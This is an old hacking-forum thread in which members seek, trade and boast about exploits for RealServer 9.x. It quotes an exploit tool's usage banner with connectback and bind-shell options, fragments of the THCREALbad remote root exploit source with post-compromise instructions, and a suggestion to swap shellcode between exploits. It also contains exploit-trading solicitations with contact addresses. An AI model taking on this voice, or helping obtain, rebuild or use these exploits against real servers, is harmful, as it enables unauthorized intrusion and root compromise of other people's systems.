Has anyone been able to succesfuly exploit this version of realserver: RealServer Version 9.0.2.794 (win32). Its seems like this particular version of 9.x is patched? Any comments...
Ripper
Sep 5 2003, 10:24 PM
yes i guess it is... i know that's TOO bad cause most of the win32 are uptodate
bratt
Sep 5 2003, 10:26 PM
You want this exploit ? ........is a 0day
-f use findsck shellcode - [Linux Arch] -c [ip] connectback ip - cb port must be 10293 [Linux-FreeBSD Archs] -b bind port [Win32,Linux,FreeBSD Archs] -t [look down]
I also want it if u have it...but have u gotten that exploit to work on this particular version of realserver 9.
Ripper
Sep 6 2003, 09:44 AM
yes bratt, that exploit would be nice
woutiir
Sep 6 2003, 10:32 AM
Yeah, post it here or in a new topic. Would be great..
Greetings, woutiir
Icarus
Sep 6 2003, 01:35 PM
Great yes bratt i want these exploit
bratt
Sep 6 2003, 03:01 PM
A member of our crew have it ...he found it on a stro yesterday
We want to exchange with other unreleased exploit ...if u have it contact
tnkcrew@email.it
Daume
Sep 6 2003, 03:07 PM
[xt33nx@cha0tix .0rp89]$./rp89
----------------------------------------------------- Real Server 8.0.2.471 - 9.0.2.794,Helix Universal Server Exploit - priv-ed
By xt33nx - cha0tix crew Usage: ./rp89 [-fcbt] [host] [port]
-f use findsck shellcode - [Linux Arch] -c [ip] connectback ip - cb port must be 10293 [Linux-FreeBSD Archs] -b bind port [Win32,Linux,FreeBSD Archs] -t [look down]
Targets: 0 - 8.0.2.471 - 9.0.2.794 [Linux Arch] 1 - Helix Universal 9.0.2 - soon! lol [Linux Arch] 2 - 8.0.2.471 - 9.0.2.794 [Win32 Arch] [WinXP/Win2000] 3 - 8.0.2.471 - 9.0.2.794 [Win32 Arch] [NT4] 4 - 8.0.2.471 - 9.0.2.794 [FreeBSD Arch] -- ok, decided to give this baby out, since it has been exploited alot from the release of THCREALbad 0.4 -- ideas,codez from canvas and THCREALbad -- mail ur 0day,unreleased exploits to xt33nx@linuxmail.org or xt33nx@hotmail.com
Ripper
Sep 6 2003, 09:42 PM
already got that Foxweb proof of concept exploit?? i think you do... else you wont have the Realserv one
arhamz
Sep 7 2003, 02:20 AM
i found the following code for Real Server 9, 8, 7 Remote Root Exploit (Windows & Linux)
QUOTE
/*************************************************************** /* THCREALbad 0.4 - Wind0wZ & Linux remote root exploit /* Exploit by: Johnny Cyberpunk thehackerschoice /* THC PUBLIC SOURCE MATERIALS /* /* http://www.service.real.com/help/faq/secur...loit082203.html /* /* After successful exploitation of a Linux box just type in the following /* ps -ef | grep -i rmserver /* and then search for the first appearing master pid of rmserver and type /* kill -9 <master pid of rmserver> /* Otherwise the master process detects that the compromised thread isn't /* running in a stable state any longer and kicks u of the box. /* On Windows Realservers it doesn't matter, the connection keeps up. /* /* Also try the testing mode before exploitation of this bug, what OS is /* running on the remote site, to know what type of shellcode to use. /* /* Greetings go to Dave Aitel of Immunitysec who found that bug. /* /* compile with MS Visual C++ : cl THCREALbad.c /***************************************************************
strcpy(finalbuffer,attackbuffer1); os = (unsigned short)atoi(argv[2]); switch(os) { case WINDOWS: decoder[11]=0x90; break; case LINUX: decoder[11]=0x05; break; case OSTESTMODE: break; default: printf("\nillegal OS value!\n"); exit(-1); }
void usage() { unsigned int a; printf("\nUsage: <Host> <OS>\n"); printf("0 = Wind0wZ\n"); printf("1 = Linux\n"); printf("2 = OS Test Mode\n"); exit(0); }
i dont know if its the same one as we use .... but here it is ..... anyone here can complie it ?.... hopefully its not tha same one .... i dont know ... just check it out ... thanx...
arhamz
Sep 7 2003, 02:22 AM
k.. after i figured out that this is the same one. ... so sorry guyz .... i feel very stupid now ...
bratt
Sep 7 2003, 09:04 AM
QUOTE (arhamz @ Sep 7 2003, 02:22 AM)
k.. after i figured out that this is the same one. ... so sorry guyz .... i feel very stupid now ...
lol
Ripper
Sep 7 2003, 11:51 AM
hmm...
arhamz
Sep 7 2003, 04:57 PM
i dun really got a zero day exploit ... so ill just wait it to be local i guess .... since ppl are actin up cuz they got a 0day exploit ...
Ripper
Sep 7 2003, 07:53 PM
please just post it, it's not 0day anymore but maybe you want anything else in return? not another "0day" exploit, but something else?
arhamz
Sep 8 2003, 04:39 AM
ya man i dont get those ppl ... ... really dont .... should help others....
dissolutions
Sep 8 2003, 06:00 AM
FIRST OFF: This is a help forum... if you want to speak you can speak on here or don't use this medium as the first spot for communication!! if you have a 0 day exploit then so be it... If your going to give it out, give it out, if your not then keep your mouth shut about it!
SECONDLY: Guys I hate to break their bubble but until I see it from a reliable source (which these 2 guys aren't reliable at all) considering in their "Examples"
QUOTE
[xt33nx@cha0tix .0rp89]$./rp89
----------------------------------------------------- Real Server 8.0.2.471 - 9.0.2.794,Helix Universal Server Exploit - priv-ed
By xt33nx - cha0tix crew Usage: ./rp89 [-fcbt] [host] [port]
It's RealServer no space And theres no other documented version other than a hoax thread on zone-h.org which for some reason ahs exactly same output as Daume.
Guys i'd say this is mostly just a social engineer.
bratt
Sep 8 2003, 12:27 PM
QUOTE (dissolutions @ Sep 8 2003, 06:00 AM)
FIRST OFF: This is a help forum... if you want to speak you can speak on here or don't use this medium as the first spot for communication!! if you have a 0 day exploit then so be it... If your going to give it out, give it out, if your not then keep your mouth shut about it!
SECONDLY: Guys I hate to break their bubble but until I see it from a reliable source (which these 2 guys aren't reliable at all) considering in their "Examples"
QUOTE
[xt33nx@cha0tix .0rp89]$./rp89
----------------------------------------------------- Real Server 8.0.2.471 - 9.0.2.794,Helix Universal Server Exploit - priv-ed
By xt33nx - cha0tix crew Usage: ./rp89 [-fcbt] [host] [port]
It's RealServer no space And theres no other documented version other than a hoax thread on zone-h.org which for some reason ahs exactly same output as Daume.
Guys i'd say this is mostly just a social engineer.
no comment
-= mAc =-
Sep 8 2003, 12:53 PM
@bratt: could you post this prog?
eXtErNaL
Sep 8 2003, 01:40 PM
what a non-sharing MF
Ripper
Sep 8 2003, 02:34 PM
nice pic bratty... i still miss the file in File Downloads section
(for CHR*ST's sake it's not 0day anymore!!!)
raptor
Oct 26 2003, 09:30 PM
if you google for any exploit even 0day you 'll find it... but i don't think this board is for lamers... i think that anyone that wants to be respected in this forum shouldn't ask for existing and easy to find sploits.... this is no 0day any more... so stop with this... find it in google and use it... lets write a new sploit for something not found yet... there are lot of unexploited vulns found this week... don't chew the same gum again and again...
T3cHn0b0y
Oct 26 2003, 08:47 PM
Maybe someone can switch the realserver shellcode in the thcrealbad source code with the IIS Media Services exploit shellcode and recompile it? Just an idea
N8Falke
Oct 24 2003, 02:12 PM
i still search this tool too.....
can some help ????
please .... can somesome share it ???
greets
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
i feel very stupid now ...
should help others....
